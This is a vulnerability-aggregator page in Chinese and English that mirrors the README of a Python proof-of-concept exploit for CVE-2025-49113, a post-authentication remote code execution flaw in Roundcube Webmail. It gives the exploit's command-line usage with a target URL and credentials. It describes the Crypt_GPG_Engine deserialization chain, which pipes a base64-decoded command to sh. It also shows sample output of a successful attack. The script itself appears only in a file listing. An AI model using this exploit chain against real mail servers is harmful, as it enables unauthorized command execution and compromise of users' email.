关联漏洞
标题:
Roundcube Webmail 安全漏洞
(CVE-2025-49113)
描述:Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞,该漏洞源于未验证_from参数,可能导致PHP对象反序列化攻击。
描述
💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
介绍
# CVE-2025-49113 – Roundcube Webmail RCE Exploit (Python PoC)
> **CVE ID:** CVE-2025-49113
> **Exploit Type:** Remote Code Execution (via PHP Object Injection)
> **Application:** Roundcube Webmail ≤ 1.5.9 and ≤ 1.6.10
> **Exploit Language:** Python
> **Author:** 00xCanelo
> **Status:** Tested and Working on Vulnerable Roundcube Installations
---
## 📌 Description
This exploit leverages a vulnerability in how Roundcube Webmail handles uploaded image filenames which are unserialized as PHP objects. By crafting a malicious payload that triggers a `Crypt_GPG_Engine` deserialization chain, remote command execution can be achieved **post-authentication**.
This Python PoC mimics the attack chain used by the public PHP exploit, but with cleaner logic, optional logging, and ease of usage in offensive tooling setups.
---
## 🚧 Prerequisites
- Vulnerable Roundcube version (≤1.5.9 or ≤1.6.10)
- Valid user credentials on Roundcube
- Python 3.x environment
- `pip install requests`
---
## 🚀 Exploitation Steps
```bash
python3 CVE-2025-49113.py <target_url> <username> <password> <command>
```
### Example:
```bash
python3 CVE-2025-49113.py https://mail.target.htb/ user@target.htb 'P@ssw0rd123' 'id'
```
---
## 🔐 Vulnerable Chain
The PHP class `Crypt_GPG_Engine` allows setting a `_gpgconf` field, which is then passed to shell execution.
Our payload crafts:
```php
echo "<base64-encoded-cmd>" | base64 -d | sh
```
in `_gpgconf`, which leads to RCE upon deserialization.
---
## 💣 Sample Output
```bash
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
```
---
## 📁 File Structure
```
.
├── CVE-2025-49113.py # Python PoC script
└── README.md # This documentation
```
---
## ⚠️ Disclaimer
This code is for **educational and authorized security testing** purposes only. Any misuse of this tool is strictly prohibited. The author is not responsible for any damages caused.
---
## 🧠 References
- https://nvd.nist.gov/vuln/detail/CVE-2025-49113
- https://github.com/roundcube/roundcubemail/issues/9312
- https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
文件快照
[4.0K] /data/pocs/b489cf5557177a4daa9eac672601d20031b9cf99
├── [4.5K] CVE-2025-49113.py
└── [2.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。